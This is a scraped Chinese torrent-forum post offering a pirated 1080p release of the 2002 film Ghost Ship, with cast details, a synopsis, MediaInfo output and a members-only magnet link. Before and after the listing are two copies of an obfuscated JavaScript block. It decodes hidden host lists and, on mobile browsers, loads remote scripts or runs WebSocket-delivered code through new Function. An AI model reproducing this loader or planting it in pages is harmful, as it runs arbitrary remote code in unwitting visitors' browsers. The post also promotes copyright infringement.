幽灵船[中文字幕].Ghost.Ship.2002.1080p.BluRay.DTS.x265-10bit 8.22GB

版主小s 25天前 247

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 幽灵船 / 鬼船 / 吓破胆

◎片 名 Ghost Ship

◎年 代 2002

◎产 地 美国 / 澳大利亚

◎类 别 悬疑 / 惊悚 / 恐怖

◎语 言 英语 / 意大利语

◎上映日期 2002-10-25(美国)

◎IMDb链接 https://www.imdb.com/title/tt0288477/

◎豆瓣评分 6.9/10 (37645人评价)

◎豆瓣链接 https://movie.douban.com/subject/1296535/

◎片 长 91分钟

◎导 演 史蒂芬·贝克 Steve Beck (id:1317586)

◎演 员 加布里埃尔·伯恩 Gabriel Byrne (id:1044881)

朱丽安娜· 玛格丽丝 Julianna Margulies (id:1017890)

朗·埃达德 Ron Eldard (id:1031973)

戴斯蒙德·哈灵顿 Desmond Harrington (id:1027190)

艾赛亚·华盛顿 Isaiah Washington (id:1025234)

卡尔·厄本 Karl Urban (id:1017903)

艾米莉·布朗宁 Emily Browning (id:1036352)

阿利克斯·迪米崔德斯 Alex Dimitriades (id:1014081)

伊恩·加德纳 Iain Gardiner (id:1455244)

杰米·吉登斯 Jamie Giddens (id:1455154)

弗朗西斯卡·雷通迪尼 Francesca Rettondini (id:1146543)

鲍里斯·布尔基奇 Boris Brkic (id:1455242)

罗杰·巴顿 Roger Barton (id:1421372)

◎标 签 恐怖 / 惊悚 / 美国 / 悬疑 / 幽灵船 / 美国电影 / 恐怖片 / 2002

◎简 介

1962年5月,意大利豪华客轮安东尼亚?格拉撒号在行驶到白令海峡附近时,连同船上数百名乘客突然凭空消失,成为近代航海史著名的悬案之一。

2002年,一架加拿大空军的飞机在该海域发现了一艘随波逐流的小船,飞行员杰克?弗里曼(Desmond Harrington 饰)为小船背后的秘密所吸引,他雇佣西恩?墨菲船长(Gabriel Byrne 饰)及其搜救小组前去公海寻找那艘漫无目的漂泊的客轮。按照海洋法规定,任何在公海发现的无主船只都归发现者所有,而一艘豪华客轮无疑是一笔巨大的财富。及至找到目标时莫菲船长才发现,这便是那艘消失了四十年之久的安东尼亚?格拉撒号!

为财富所吸引,他们相继登上这艘客轮,而各种怪异诡秘的事件也相继发生……

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 217331617045332681682945999555762218215 (0xA3808C027D0A5177700B1E8272EA64E7)

  4. Complete name : [email protected]

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 8.22 GiB

  8. Duration : 1 h 30 min

  9. Overall bit rate : 13.0 Mb/s

  10. Movie name : Ghost Ship 2002 1080p BluRay DTS [email protected]

  11. Encoded date : UTC 2021-11-06 01:14:55

  12. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 30 min

  21. Bit rate : 11.4 Mb/s

  22. Width : 1 920 pixels

  23. Height : 1 036 pixels

  24. Display aspect ratio : 1.85:1

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.240

  31. Stream size : 7.25 GiB (88%)

  32. Title : @HDSky

  33. Writing library : x265 - H.265/HEVC codec

  34. Default : Yes

  35. Forced : No


  36. Audio

  37. ID : 2

  38. Format : DTS

  39. Format/Info : Digital Theater Systems

  40. Codec ID : A_DTS

  41. Duration : 1 h 30 min

  42. Bit rate mode : Constant

  43. Bit rate : 1 509 kb/s

  44. Channel(s) : 6 channels

  45. Channel layout : C L R Ls Rs LFE

  46. Sampling rate : 48.0 kHz

  47. Frame rate : 93.750 FPS (512 SPF)

  48. Bit depth : 24 bits

  49. Compression mode : Lossy

  50. Stream size : 979 MiB (12%)

  51. Title : English

  52. Language : English

  53. Default : Yes

  54. Forced : No


  55. Text #1

  56. ID : 3

  57. Format : PGS

  58. Muxing mode : zlib

  59. Codec ID : S_HDMV/PGS

  60. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  61. Duration : 1 h 25 min

  62. Bit rate : 20.7 kb/s

  63. Count of elements : 1450

  64. Stream size : 12.6 MiB (0%)

  65. Title : CHS

  66. Language : Chinese

  67. Default : Yes

  68. Forced : No


  69. Text #2

  70. ID : 4

  71. Format : PGS

  72. Muxing mode : zlib

  73. Codec ID : S_HDMV/PGS

  74. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  75. Duration : 1 h 25 min

  76. Bit rate : 21.2 kb/s

  77. Count of elements : 1450

  78. Stream size : 13.0 MiB (0%)

  79. Title : CHT

  80. Language : Chinese

  81. Default : No

  82. Forced : No


  83. Menu

  84. 00:00:00.000 : en:Chapter 01

  85. 00:05:30.288 : en:Chapter 02

  86. 00:11:01.578 : en:Chapter 03

  87. 00:20:34.442 : en:Chapter 04

  88. 00:28:37.257 : en:Chapter 05

  89. 00:35:51.649 : en:Chapter 06

  90. 00:43:22.725 : en:Chapter 07

  91. 00:52:18.469 : en:Chapter 08

  92. 01:00:52.232 : en:Chapter 09

  93. 01:09:06.476 : en:Chapter 10

  94. 01:17:19.051 : en:Chapter 11

  95. 01:26:15.879 : en:Chapter 12




复制代码




此处一般会放置磁力链或电驴下载链接,不过此链接需要注册会员才能看到,点击“立即注册”
磁力链下载【磁力链接仅对注册会员开放,登陆后可见】

TAGS 惊悚 恐怖 悬疑

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};